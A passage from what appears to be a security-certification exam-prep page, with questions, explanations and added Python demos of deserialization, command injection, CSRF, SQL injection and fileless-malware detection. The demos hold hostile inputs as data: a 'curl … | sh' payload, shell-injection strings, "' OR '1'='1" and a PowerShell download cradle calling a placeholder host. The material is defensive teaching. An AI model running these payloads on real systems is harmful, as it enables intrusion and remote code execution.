Option B is correct because ransomware actively encrypts files and may communicate with a command-and-control (C2) server over the network to exfiltrate data or receive encryption keys. Disconnecting the Wi-Fi immediately stops further C2 communication, prevents lateral movement to other devices, and halts any ongoing data exfiltration. This containment step is critical before any remediation like system imaging or forensic analysis.
Exam trap
The trap here is that candidates may think rebooting (Option A) will stop the malicious process, but ransomware often persists across reboots via registry run keys or scheduled tasks, and the immediate priority is containment by disconnecting the network.
How to eliminate wrong answers
Option A is wrong because rebooting the laptop may allow the ransomware to continue its encryption process on startup or trigger additional payloads, and it does not stop network-based propagation or C2 communication. Option C is wrong because deleting the ransom note does not reverse file encryption or stop the malicious process; the ransomware remains active and can continue encrypting or spreading. Option D is wrong because changing the user's password does not affect the running ransomware process, and waiting for more details allows the attack to progress, potentially encrypting more files or spreading to other systems.
A security analyst is reviewing the source code of a custom web application. The application receives JSON data from users, which includes a 'type' field. The application uses the 'type' field to determine which Java class to instantiate, and then calls a method on that object. The application does not validate or sanitize the 'type' field. An attacker sends a crafted JSON payload that causes the application to instantiate an unexpected class, leading to remote code execution. Which type of vulnerability does this example describe?
A.SQL injection
B.Cross-site scripting (XSS)
C.Insecure deserialization
D.Directory traversal
AnswerC
Correct. Insecure deserialization occurs when an application deserializes untrusted data, allowing an attacker to control serialized objects or, as in this case, the class name to be instantiated. This can lead to remote code execution, denial of service, or privilege escalation.
Why this answer
Option C is correct because the application deserializes untrusted JSON and lets the 'type' field choose which Java class to instantiate, without checking it against the set of classes the feature actually needs. That is insecure deserialization: the attacker names a class the developers never meant to expose (a so-called gadget, some class already on the classpath whose constructor, setter, or the method the application then calls has a dangerous side effect such as running a command or loading a remote resource), and the application builds it and invokes it on the attacker's behalf. JSON libraries that honour a caller-supplied type name (polymorphic deserialization) are the common real-world form of this bug. The missing validation of the 'type' field is what turns a data-parsing step into remote code execution.
Exam trap
The trap here is that candidates may confuse insecure deserialization with injection attacks (SQLi or XSS) because the attacker is 'injecting' a class name, but the core mechanism is the unsafe deserialization of untrusted data to instantiate objects, not injecting code into a query or script context.
How to eliminate wrong answers
Option A is wrong because SQL injection involves injecting malicious SQL into input that is concatenated into database queries, not dynamically instantiating classes from JSON data. Option B is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into web pages viewed by other users, not server-side object instantiation leading to remote code execution. Option D is wrong because directory traversal uses path sequences such as ../ to read or write files outside the directory the application intended; nothing here touches a filesystem path, the attacker controls which class gets instantiated.
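An added example (not code from the question, and in Python rather than the Java the question describes, because the pattern is identical): a dispatcher that lets the JSON 'type' field name the class to build, next to the fixed version that maps the field through a closed allowlist. The handler classes, the MaintenanceCommand gadget and the sample payloads are all constructed for the illustration; the gadget only records the command it would run instead of executing anything.

```python
import json


# Handlers the application legitimately exposes (assumed names).
class EchoHandler:
    def __init__(self, payload: str):
        self.payload = payload

    def run(self) -> str:
        return f"echo: {self.payload}"


class UpperHandler:
    def __init__(self, payload: str):
        self.payload = payload

    def run(self) -> str:
        return self.payload.upper()


class MaintenanceCommand:
    """A 'gadget': present in the codebase for an admin job, never meant to be
    reachable from user input. It only records the command it would run so the
    example stays harmless."""

    def __init__(self, payload: str):
        self.command = payload

    def run(self) -> str:
        return f"would execute: {self.command}"


def vulnerable_dispatch(raw_json: str) -> str:
    """The flaw from the question: 'type' names the class, unchecked."""
    data = json.loads(raw_json)
    cls = globals()[data["type"]]          # attacker picks any class in scope
    return cls(data["payload"]).run()


ALLOWED_TYPES = {"echo": EchoHandler, "upper": UpperHandler}


def hardened_dispatch(raw_json: str) -> str:
    """Fix: the input selects a label from a closed allowlist, never a class name."""
    data = json.loads(raw_json)
    if not isinstance(data, dict) or not isinstance(data.get("payload"), str):
        raise ValueError("malformed request")
    cls = ALLOWED_TYPES.get(data.get("type"))
    if cls is None:
        raise ValueError(f"unsupported type: {data.get('type')!r}")
    return cls(data["payload"]).run()


def is_rejected(dispatcher, raw_json: str) -> bool:
    """True when the dispatcher refuses the request with ValueError."""
    try:
        dispatcher(raw_json)
    except ValueError:
        return True
    return False


# Constructed sample requests.
BENIGN_VULN = json.dumps({"type": "EchoHandler", "payload": "hi"})
BENIGN_SAFE = json.dumps({"type": "echo", "payload": "hi"})
ATTACK = json.dumps({"type": "MaintenanceCommand",
                     "payload": "curl http://203.0.113.9/x | sh"})
```

The allowlist is the whole fix: the user never supplies a class name, only a label, so a gadget that happens to be loadable is simply unreachable.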
A remote user's laptop begins launching a legitimate-looking "System Update" application at login. After the update window appears, the browser homepage changes, outbound traffic increases, and the user later reports that saved passwords are being used in unauthorized logins. Which malware type is the most likely primary infection?
A.Worm, because it is spreading automatically to nearby systems on the network.
B.Trojan, because it is disguised as a harmless utility while delivering malicious payloads.
C.Ransomware, because files would be encrypted and a payment demand would appear.
D.Rootkit, because the malware is hiding its own presence by modifying kernel behavior.
AnswerB
A trojan commonly masquerades as a legitimate application, then installs or runs additional malicious functions such as credential theft and persistence.
Why this answer
Option B is correct because the malware is disguised as a legitimate 'System Update' application, which is the classic behavior of a Trojan. Trojans rely on social engineering to trick users into executing them, and once activated, they can deliver secondary payloads such as password stealers, browser hijackers, or backdoors. In this scenario, the Trojan likely installed a keylogger or credential harvester to exfiltrate saved passwords, changed browser settings via registry or configuration file manipulation, and increased outbound traffic to a command-and-control (C2) server.
Exam trap
The trap here is that candidates may confuse the visible symptoms (browser change, increased traffic) with a worm's network propagation or a rootkit's stealth, but the key indicator is the social engineering disguise of the 'System Update' application, which is the hallmark of a Trojan.
How to eliminate wrong answers
Option A is wrong because a worm spreads autonomously across networks without user interaction, often by exploiting vulnerabilities in exposed services such as SMB or RDP, whereas this infection required the user to execute the fake update at login. Option C is wrong because ransomware typically encrypts files and displays a ransom note, but the symptoms here (browser homepage change, increased traffic, stolen passwords) indicate data theft and persistence, not file encryption. Option D is wrong because a rootkit hides its presence by modifying kernel or system call tables (e.g., SSDT hooking), but the described behavior involves visible changes (homepage alteration, password theft) and no mention of stealth or kernel-level concealment.
Based on the exhibit, what is the BEST remediation for the application flaw shown?
A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.
A.Keep the current shell command, but add HTML encoding to the response page.
B.Replace the shell call with a safe library function and strictly allowlist approved host values.
C.Increase the web server timeout so the ping utility has more time to complete.
D.Require users to authenticate before they can access the page.
AnswerB
The flaw is server-side command injection caused by passing user input into a shell. A safe library call removes shell interpretation, and an allowlist limits inputs to known-good targets.
Why this answer
Option B is correct because the application flaw is command injection: a user-controlled parameter is passed directly to a shell command (e.g., `ping`). The best remediation is to replace the shell call with a safe library function (e.g., `InetAddress.isReachable()` in Java or a dedicated ICMP library) and strictly allowlist approved internal host values, eliminating the possibility of injecting arbitrary commands like `; rm -rf /`.
Exam trap
The trap here is that candidates often confuse command injection with cross-site scripting (XSS) and choose HTML encoding (Option A), or they mistakenly think authentication (Option D) or timeout adjustments (Option C) can fix a code-level injection vulnerability.
How to eliminate wrong answers
Option A is wrong because HTML encoding the response does not prevent the shell command from executing with malicious input; it only mitigates reflected XSS, not command injection. Option C is wrong because increasing the web server timeout does not address the injection vulnerability; it only changes the execution window for the ping utility, leaving the flaw exploitable. Option D is wrong because requiring authentication does not prevent an authenticated user from injecting commands; it only adds a login gate, not input validation or safe execution.
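An added example, not from the page: the connectivity check rebuilt the way Option B describes, in Python. It shows the command string the flawed version hands to a shell, the argument-vector form that keeps `;` and friends inert, and the exact-match allowlist in front of it. The approved hosts are assumed, and the runner is injectable so the example can be exercised without sending ICMP.

```python
import subprocess

# Assumption: the only hosts this page is allowed to test.
APPROVED_HOSTS = frozenset({"10.0.0.5", "10.0.0.6", "db1.corp.example"})


def flawed_command_line(host: str) -> str:
    """What the vulnerable app builds and passes to a shell (shown, never run here)."""
    return f"ping -c 1 {host}"


def argv_without_shell(host: str) -> list:
    """Step 1 of the fix: an argument vector. No shell parses it, so ';', '|'
    and '$()' arrive as ordinary characters inside a single argument."""
    return ["ping", "-c", "1", host]


def validate_host(host: str) -> str:
    """Step 2: exact-match allowlist, no regex and no substring matching."""
    candidate = host.strip().lower()
    if candidate not in APPROVED_HOSTS:
        raise ValueError(f"host not approved: {host!r}")
    return candidate


def check_connectivity(host: str, runner=subprocess.run) -> int:
    """Validate, then execute with shell=False and a timeout."""
    argv = argv_without_shell(validate_host(host))
    completed = runner(argv, shell=False, capture_output=True, timeout=5)
    return completed.returncode


def demo() -> dict:
    """Runs the injected and the approved input through each stage."""
    calls = []

    def recording_runner(argv, **kwargs):
        calls.append(argv)                      # record instead of pinging
        return subprocess.CompletedProcess(argv, 0)

    injected = "10.0.0.5; id"                   # constructed attacker input
    out = {
        "flawed_string": flawed_command_line(injected),
        "argv_keeps_payload_inert": argv_without_shell(injected),
    }
    try:
        check_connectivity(injected, runner=recording_runner)
        out["injected_accepted"] = True
    except ValueError:
        out["injected_accepted"] = False
    out["approved_rc"] = check_connectivity("10.0.0.5", runner=recording_runner)
    out["argv_run"] = calls[0]
    return out
```

Even without the allowlist, the argv form would only make ping fail on a nonsense hostname instead of running `id`; the allowlist additionally stops the page being used to probe hosts it was never meant to reach.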
A customer portal has a form that submits a money-transfer request with the user’s existing session cookie. Security testing shows that if a user visits a malicious site while logged in, the portal will submit the transfer request without any additional verification. Which control would best reduce this risk?
A.Replace the transfer form with a stored procedure
B.Add a server-validated anti-CSRF token to each state-changing request
C.Enable input length limits on the transfer amount field
D.Turn on content security policy to block all script execution
AnswerB
An anti-CSRF token is the best control because it ties the request to the legitimate application session and makes it difficult for an attacker-controlled site to forge the request successfully. State-changing actions such as transfers should validate a unique token on the server side, ideally with other browser protections like SameSite cookies. This directly addresses cross-site request forgery.
Why this answer
The described attack is a Cross-Site Request Forgery (CSRF), where a malicious site forces an authenticated user's browser to submit a state-changing request without the user's consent. Adding a server-validated anti-CSRF token ensures that each request includes a unique, unpredictable value tied to the user's session, which the server verifies before processing. This prevents the malicious site from forging a valid request because it cannot guess or obtain the token.
Exam trap
The trap here is that candidates may confuse CSRF with XSS or session hijacking, and incorrectly choose input validation or stored procedures, not realizing that the core vulnerability is the lack of origin verification for state-changing requests.
How to eliminate wrong answers
Option A is wrong because replacing the transfer form with a stored procedure addresses database injection or logic issues, not the lack of request origin verification; a stored procedure does not prevent a malicious site from submitting a forged request with the user's session cookie. Option C is wrong because input length limits on the transfer amount field only restrict the size of the input data, which does nothing to verify that the request originated from the legitimate portal rather than a cross-site source. Option D is wrong because CSRF needs no script on the portal's pages: an HTML form auto-submitted from the attacker's site, or an image tag for a GET-based action, makes the browser send the request with the session cookie attached. The portal's Content Security Policy governs which scripts its own pages may load; it has no effect on the attacker's page and blocking all script would break the portal's own functionality.
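An added example, not part of the original page: a transfer handler that checks a session-bound anti-CSRF token first and the Origin header second, exercised with a legitimate request and three forged ones. The session store, the portal origin and the request shape are constructed for the illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)                   # assumption: per-deployment secret
SESSIONS = {"s-1a2b": "alice", "s-9z8y": "mallory"}    # constructed session store
PORTAL_ORIGIN = "https://portal.example"               # assumption


def issue_csrf_token(session_id: str) -> str:
    """nonce.HMAC(key, session_id:nonce): unguessable, and bound to one session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_transfer(request: dict) -> tuple:
    """request = {"cookies": {...}, "headers": {...}, "form": {...}} (constructed shape)."""
    sid = request["cookies"].get("session")
    user = SESSIONS.get(sid)
    if user is None:
        return 401, "no valid session"
    # Primary control: the token must have been minted for this very session.
    if not verify_csrf_token(sid, request["form"].get("csrf_token", "")):
        return 403, "csrf token missing or not bound to this session"
    # Second layer: browsers send Origin on cross-site POSTs; refuse foreign ones.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != PORTAL_ORIGIN:
        return 403, f"cross-origin request from {origin}"
    return 200, f"{user} transferred {request['form']['amount']} to {request['form']['to']}"


def demo() -> dict:
    alice_token = issue_csrf_token("s-1a2b")
    mallory_token = issue_csrf_token("s-9z8y")

    def request(token=None, origin="https://evil.example", to="mallory-acct", amount="5000"):
        form = {"to": to, "amount": amount}
        if token is not None:
            form["csrf_token"] = token
        # The browser attaches alice's cookie no matter which site made the request.
        return {"cookies": {"session": "s-1a2b"}, "headers": {"Origin": origin}, "form": form}

    return {
        "legitimate": handle_transfer(request(alice_token, PORTAL_ORIGIN, "savings-42", "100")),
        # Attacker's page cannot read alice's token, so it sends none.
        "forged_no_token": handle_transfer(request()),
        # Attacker pastes in a token from her own session: valid, but bound to s-9z8y.
        "forged_wrong_session": handle_transfer(request(mallory_token)),
        # Even a leaked token still trips the Origin layer from a foreign site.
        "leaked_token_cross_origin": handle_transfer(request(alice_token)),
    }
```

The token is the control the question asks for; the Origin check and a SameSite attribute on the session cookie are the cheap extra layers worth stacking on top of it.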
NetFlow shows one workstation opening SMB connections to a dozen internal servers and then attempting many WinRM connections. What is the most likely explanation?
A.The host is likely being used for lateral movement or internal reconnaissance.
B.The workstation is probably downloading a routine operating system update.
C.The network is likely suffering from a wireless interference problem.
D.The user is likely printing documents to multiple shared printers.
AnswerA
That pattern suggests a compromised system probing nearby hosts and trying to spread access.
Why this answer
SMB connections to many internal servers followed by WinRM attempts is a classic pattern of lateral movement or internal reconnaissance. An attacker or compromised host uses SMB (TCP 445) to enumerate accessible shares and test credentials, then turns to WinRM (TCP 5985/5986) for remote command execution; lateral-movement tooling such as PsExec (over SMB) and CrackMapExec (over SMB and WinRM) produces exactly this fan-out from one source to many hosts.
Exam trap
The trap here is that candidates may mistake the SMB traffic for normal file sharing or printing, overlooking that WinRM is a remote execution protocol, not a file or print service, and thus the combination signals active reconnaissance or lateral movement.
How to eliminate wrong answers
Option B is wrong because routine OS updates use Windows Update (HTTP/S to Microsoft servers), not SMB connections to internal servers followed by WinRM. Option C is wrong because wireless interference would cause connectivity issues, not a specific pattern of SMB then WinRM traffic. Option D is wrong because printing to shared printers uses SMB for print spooling but does not involve WinRM connections, which are for remote management and command execution.
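An added example (not from the page) of turning the pattern above into a detection over flow records: one source that fans out to many hosts on 445 and then tries WinRM within a short window is flagged, while a host that touches two file shares, or one admin connection to a jump host, is not. The flow records, thresholds and addresses are all constructed.

```python
from collections import defaultdict

SMB_PORT = 445
WINRM_PORTS = {5985, 5986}

# Constructed NetFlow-style records: (epoch seconds, src, dst, dst_port).
BASE = 1_700_000_000
FLOWS = []
for i in range(12):                                    # SMB sweep of 12 servers
    FLOWS.append((BASE + i * 5, "10.10.4.23", f"10.10.20.{10 + i}", SMB_PORT))
for i in range(8):                                     # then WinRM attempts
    FLOWS.append((BASE + 90 + i * 3, "10.10.4.23", f"10.10.20.{10 + i}", 5985))
FLOWS += [
    (BASE + 10, "10.10.4.50", "10.10.20.10", SMB_PORT),   # normal user: file server
    (BASE + 400, "10.10.4.50", "10.10.20.11", SMB_PORT),  # and the print server
    (BASE + 30, "10.10.4.77", "10.10.20.30", 5985),       # admin to a single jump host
]


def detect_lateral_movement(flows, smb_fanout: int = 5, window: int = 600) -> list:
    """Alert on sources that reach >= smb_fanout distinct hosts on 445 and then
    attempt WinRM within `window` seconds of the first SMB connection."""
    per_src = defaultdict(list)
    for ts, src, dst, port in sorted(flows):
        per_src[src].append((ts, dst, port))

    alerts = []
    for src, records in per_src.items():
        smb = [(ts, dst) for ts, dst, port in records if port == SMB_PORT]
        winrm = [(ts, dst) for ts, dst, port in records if port in WINRM_PORTS]
        smb_targets = {dst for _, dst in smb}
        if len(smb_targets) < smb_fanout or not winrm:
            continue
        first_smb = min(ts for ts, _ in smb)
        if any(ts - first_smb <= window for ts, _ in winrm):
            alerts.append({
                "src": src,
                "smb_targets": len(smb_targets),
                "winrm_attempts": len(winrm),
                "winrm_targets": sorted({dst for _, dst in winrm}),
            })
    return alerts
```

Tune `smb_fanout` against your own baseline: domain controllers and backup servers legitimately touch many hosts on 445, so exclude known scanners and management servers rather than lowering the threshold.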
A vulnerability scan of a Linux application server reports these findings: OpenSSL 3.0.7 is flagged with a critical CVE, but the distribution vendor note says the fix was backported. Port 8443 is bound to all interfaces, yet a firewall blocks it from the internet. The internal admin console on that port still uses the default admin/admin credentials and is reachable from the corporate VLAN. Which issue should be remediated first?
A.Upgrade OpenSSL immediately, because the reported CVE proves the package is exploitable as installed.
B.Ignore the 8443 service, because the internet firewall already prevents external exposure.
C.Change the default credentials on the internal admin console and restrict access to only approved management hosts.
D.Leave the console as-is and focus only on changing the bind address to 127.0.0.1.
AnswerC
Default credentials on a reachable administrative interface are the highest-risk issue in the list. The console is accessible from the corporate VLAN, so an internal attacker or compromised endpoint could log in immediately without needing a vulnerability exploit. The OpenSSL finding may be a false positive due to backporting, and the firewall already limits internet reach, but default admin/admin credentials create direct compromise risk.
Why this answer
Option C is correct because the most immediate risk is that an attacker on the corporate VLAN can access the internal admin console using default credentials (admin/admin). This bypasses the firewall and allows full control of the application server. Even though OpenSSL has a backported fix, the default credentials represent an active, easily exploitable vulnerability that requires no additional exploit development.
Exam trap
The trap here is that candidates focus on the critical CVE and the firewall rule, overlooking that default credentials on an internally reachable service pose a more immediate and easily exploitable risk than a patched vulnerability or a network control that does not protect against internal threats.
How to eliminate wrong answers
Option A is wrong because the distribution vendor has backported the fix, meaning the installed OpenSSL 3.0.7 is patched against the CVE despite the version number; upgrading is unnecessary and could break dependencies. Option B is wrong because the firewall only blocks internet traffic, but the admin console is reachable from the corporate VLAN, which is a trusted network that may still contain compromised hosts or insider threats. Option D is wrong because changing the bind address to 127.0.0.1 alone does not address the default credentials; an attacker on the local host could still exploit them, and the console would remain accessible to anyone who gains local access.
A help desk technician reviews a voicemail in which the caller claims to be from the security team, says the user will be locked out unless they read back a one-time passcode, and leaves a callback number. What type of attack is this?
A.Smishing, because the attacker is using a text message with a link.
B.Vishing, because the attacker is using voice communication to pressure the user.
C.Baiting, because the attacker is offering a reward to entice the user.
D.Pretexting, because the attacker invented a role and story.
AnswerB
Vishing is voice-based social engineering, including phone calls and voicemail messages that try to pressure the target into revealing information. Requesting a one-time passcode is especially dangerous because it can let an attacker bypass MFA protections. The callback number is often used to appear legitimate and keep the victim engaged long enough to disclose sensitive data.
Why this answer
Option B is correct because vishing (voice phishing) uses voice communication—such as phone calls or voicemails—to trick victims into revealing sensitive information. In this scenario, the attacker leaves a voicemail claiming to be from the security team and pressures the user to read back a one-time passcode, which is a classic vishing tactic that exploits trust and urgency over voice channels.
Exam trap
The trap here is that candidates may confuse vishing with smishing because both involve social engineering over digital communication, but the key differentiator is the medium: voice (voicemail/call) versus text message (SMS).
How to eliminate wrong answers
Option A is wrong because smishing specifically involves SMS text messages, often containing a malicious link, not a voicemail or callback number. Option C is wrong because baiting relies on offering a reward (e.g., free download or USB drive) to entice the victim into an action, not on impersonating authority and creating urgency to extract a passcode. Option D is wrong because, although the caller relies on a pretext (an invented security-team role and a lockout story), pretexting names the fabricated scenario that many social engineering attacks share; the question asks for the attack type, and the voice channel is what defines this one as vishing.
An employee receives an email that appears to come from the HR team. It says their payroll account will be suspended unless they click a link and sign in within 30 minutes. What type of attack is this most likely?
A.Smishing
B.Phishing
C.Vishing
D.Pretexting
AnswerB
Phishing uses deceptive messages to trick a user into clicking a link, entering credentials, or taking another unsafe action. This email pretends to be from HR, creates urgency, and tries to push the user into signing in on a fake page.
Why this answer
This is a classic phishing attack because the threat actor uses a deceptive email message to trick the recipient into clicking a malicious link and providing sensitive credentials. Phishing specifically refers to social engineering attacks delivered via email, often leveraging urgency and impersonation of a trusted entity like HR to bypass the victim's critical thinking.
Exam trap
The trap here is that candidates often confuse phishing with vishing or smishing because all three involve impersonation and urgency, but the specific delivery vector (email vs. SMS vs. voice call) is the key differentiator the exam expects you to identify.
How to eliminate wrong answers
Option A is wrong because smishing is a social engineering attack delivered via SMS (Short Message Service) text messages, not email. Option C is wrong because vishing (voice phishing) is conducted over voice calls or VoIP, not through an email message. Option D is wrong because pretexting is a social engineering technique where the attacker fabricates a scenario (pretext) to steal information, but it does not inherently involve a phishing link or email; the attack described specifically uses an email with a link, which is the hallmark of phishing.
A user reports receiving repeated MFA push requests even though they are not logging in. Later, someone calls and claims to be IT, asking the user to approve one prompt so support can finish a password reset. Which control would best reduce the success of this attack?
A.Increase password complexity requirements
B.Use phishing-resistant MFA with number matching or hardware security keys
C.Shorten the screen-lock timeout on user devices
D.Allow users to approve any MFA prompt sent during business hours
AnswerB
These controls require stronger user verification and reduce the chance that a simple push approval will defeat MFA.
Why this answer
Option B is correct because phishing-resistant MFA, such as number matching or hardware security keys (e.g., FIDO2/WebAuthn), prevents an attacker from tricking the user into approving a fraudulent push request. Number matching requires the user to enter a number displayed on the login screen into the MFA prompt, so an approval is tied to a login attempt the user can actually see. Hardware security keys use a cryptographic challenge-response in which the signed response is bound to the site origin and to that specific attempt, so an attacker cannot relay it to another session or replay it later.
Exam trap
The trap here is that candidates often confuse MFA fatigue with password-based attacks and incorrectly choose password complexity (A) or screen-lock timeout (C), failing to recognize that the core vulnerability is the user's ability to approve a push without verifying the context.
How to eliminate wrong answers
Option A is wrong because increasing password complexity does not address MFA fatigue or social engineering; the attacker is already bypassing the password by exploiting the MFA approval process. Option C is wrong because shortening the screen-lock timeout only reduces the risk of unauthorized physical access to an unlocked device, but does not prevent the user from approving a fraudulent MFA prompt on their own device. Option D is wrong because allowing users to approve any MFA prompt during business hours directly enables the attack; it removes the user's discretion and encourages blind approval, which is exactly what the attacker is exploiting.
During testing, a login form returns all user records when the tester enters ' OR '1'='1 in a username field. What is the best fix for this issue?
A.Hide database error messages from the login page only
B.Use parameterized queries or prepared statements
C.Require users to change passwords more often
D.Move the login page to a different URL
AnswerB
Parameterized queries separate user input from SQL commands, which prevents the database from treating input as executable code.
Why this answer
The SQL injection attack ' OR '1'='1 bypasses authentication by always evaluating to true, returning all user records. Parameterized queries (prepared statements) separate SQL logic from user input, preventing the injected string from altering the query structure. This is the industry-standard mitigation for SQL injection vulnerabilities.
Exam trap
The trap here is that candidates often choose hiding error messages (Option A) because they confuse symptom masking with root-cause remediation, but the exam tests the principle that parameterized queries, with input validation as defense in depth, are the reliable fix for SQL injection; hiding errors only makes the injection harder to see, not harder to exploit.
How to eliminate wrong answers
Option A is wrong because hiding error messages is a defense-in-depth measure that does not prevent the SQL injection itself; the attack still succeeds even if errors are hidden. Option C is wrong because password rotation policies do not address the root cause of SQL injection; they only reduce the window of compromised credentials. Option D is wrong because moving the login page to a different URL does not fix the vulnerability; the same injection would work on the new URL if the code remains unchanged.
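An added example, not from the page, using an in-memory SQLite database: the user lookup written with string concatenation returns every row for the tester's `' OR '1'='1` input, and the same lookup with a bound parameter returns none, because the input is delivered as a value rather than as SQL text. The table and its three rows are constructed.

```python
import sqlite3

SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, role TEXT NOT NULL);
INSERT INTO users (username, role) VALUES ('alice', 'user'), ('bob', 'user'), ('carol', 'admin');
"""

PAYLOAD = "' OR '1'='1"   # exactly what the tester typed into the username field


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> list:
    """The flaw: input is pasted into the SQL text, so quotes change the query."""
    query = f"SELECT id, username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def parameterized_lookup(conn: sqlite3.Connection, username: str) -> list:
    """The fix: the query shape is fixed; the driver binds the value separately."""
    query = "SELECT id, username, role FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def demo() -> dict:
    conn = fresh_db()
    try:
        return {
            "normal_vulnerable": vulnerable_lookup(conn, "alice"),
            "injected_query_text": f"SELECT id, username, role FROM users WHERE username = '{PAYLOAD}'",
            "injected_vulnerable": vulnerable_lookup(conn, PAYLOAD),
            "normal_parameterized": parameterized_lookup(conn, "alice"),
            "injected_parameterized": parameterized_lookup(conn, PAYLOAD),
        }
    finally:
        conn.close()
```

The rendered query text in the result shows why it works: `WHERE username = '' OR '1'='1'` is true for every row. The parameterized version asks the database for a user literally named `' OR '1'='1`, which does not exist.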
A file server suddenly renames documents, creates ransom notes, and users can no longer open their files. Which malware type is most likely involved?
A.Spyware
B.Ransomware
C.Rootkit
D.Worm
AnswerB
Ransomware encrypts or blocks access to data and demands payment for recovery. Renaming files and leaving ransom notes are classic signs, especially when users can no longer open shared documents.
Why this answer
Ransomware is the correct answer because it specifically encrypts files and demands payment for decryption. The symptoms—documents being renamed, ransom notes appearing, and users losing access to their files—are classic indicators of ransomware activity, which typically uses a hybrid scheme: a fast symmetric cipher such as AES for the files themselves and an asymmetric key such as RSA to protect the per-victim symmetric key so that only the attacker can release it.
Exam trap
The trap here is that candidates may confuse the file-renaming and note-creation behavior with a logic bomb or virus, but the core differentiator is the extortion demand and encryption-based access loss, which is unique to ransomware.
How to eliminate wrong answers
Option A is wrong because spyware is designed to covertly gather information (e.g., keystrokes, browsing habits) without altering or encrypting files; it does not rename documents or create ransom notes. Option C is wrong because a rootkit provides persistent, stealthy access to a system by hiding its presence (e.g., hooking system calls or modifying kernel data structures), but it does not directly rename files or demand ransoms. Option D is wrong because a worm is defined by self-replication across the network; it may carry ransomware as a payload, but propagation alone does not rename files or leave ransom notes.
An EDR console shows PowerShell launching from a scheduled task, decoding a command from memory, and spawning rundll32.exe. No suspicious executable is written to disk, and the activity stops when the process ends. Which threat best fits this behavior?
A.Trojan downloader
B.Fileless malware
C.Rootkit
D.Worm
AnswerB
Fileless malware executes primarily in memory and often uses trusted tools like PowerShell.
Why this answer
The behavior describes PowerShell decoding a command from memory and spawning rundll32.exe without writing any executable to disk, which is the hallmark of fileless malware. Fileless malware keeps its payload in memory and drives legitimate system tools (PowerShell, rundll32) to run it, so there is no malicious binary for file-based antivirus to scan, and the activity ends when the host process exits. The scheduled task that launched PowerShell is the persistence mechanism, but it stores only a command line, not a dropped executable, which is why the activity can return at the next trigger without ever leaving a file to detect.
Exam trap
CompTIA often tests the misconception that any malware using PowerShell must be a Trojan downloader, but the key differentiator here is the absence of a file written to disk and the memory-only execution, which points directly to fileless malware.
How to eliminate wrong answers
Option A is wrong because a Trojan downloader typically writes a malicious executable to disk and then downloads additional payloads, but here no executable is written to disk. Option C is wrong because a rootkit is designed to hide its presence and maintain persistent kernel-level access, often by modifying system files or drivers, whereas this threat is ephemeral and runs only in user-mode memory without persistence. Option D is wrong because a worm self-replicates across networks to infect other systems, usually by copying itself to remote locations, but this threat does not exhibit self-propagation or network-based replication.
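An added example that serves both fileless-malware questions on this page (the finance-workstation alert with the encoded command, rundll32 and the scheduled task, and the EDR console case above); it is not code from the page. It runs three checks over constructed process-creation events: decode a `-EncodedCommand` argument (base64 of UTF-16LE) and look for in-memory execution markers, flag a living-off-the-land binary spawned by a script host, and flag scheduled-task creation from that same parent. The events, PIDs, download URL and marker list are all constructed.

```python
import base64
import re


def encode_powershell(script: str) -> str:
    """powershell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed download cradle: fetches and runs a payload without touching disk.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"

# Constructed process-creation events: pid, parent pid, image, command line.
EVENTS = [
    {"pid": 4100, "ppid": 612, "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"pid": 5200, "ppid": 4100, "image": "powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {encode_powershell(CRADLE)}"},
    {"pid": 5310, "ppid": 5200, "image": "rundll32.exe", "cmdline": "rundll32.exe"},
    {"pid": 5420, "ppid": 5200, "image": "schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc onlogon /tn Updater /tr "powershell -enc ..."'},
    {"pid": 6000, "ppid": 700, "image": "powershell.exe",          # benign admin script
     "cmdline": "powershell.exe -File C:\\ops\\backup.ps1"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe"}
IN_MEMORY_MARKERS = re.compile(
    r"IEX|Invoke-Expression|DownloadString|FromBase64String|Reflection\.Assembly\]::Load", re.I)
# -e, -ec, -enc and -EncodedCommand are all accepted abbreviations.
ENC_FLAG = re.compile(r"(?<![\w-])-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None if there is no decodable -enc argument."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events: list) -> list:
    """Return (finding, pid, detail) tuples for the fileless indicators."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        parent_is_script = parent is not None and parent["image"].lower() in SCRIPT_HOSTS
        if image in SCRIPT_HOSTS:
            decoded = decode_encoded_command(e["cmdline"])
            if decoded and IN_MEMORY_MARKERS.search(decoded):
                findings.append(("encoded_powershell_in_memory_payload", e["pid"], decoded))
        if image in LOLBINS and parent_is_script:
            findings.append(("lolbin_spawned_by_script_host", e["pid"],
                             f"{parent['image']} -> {e['image']}"))
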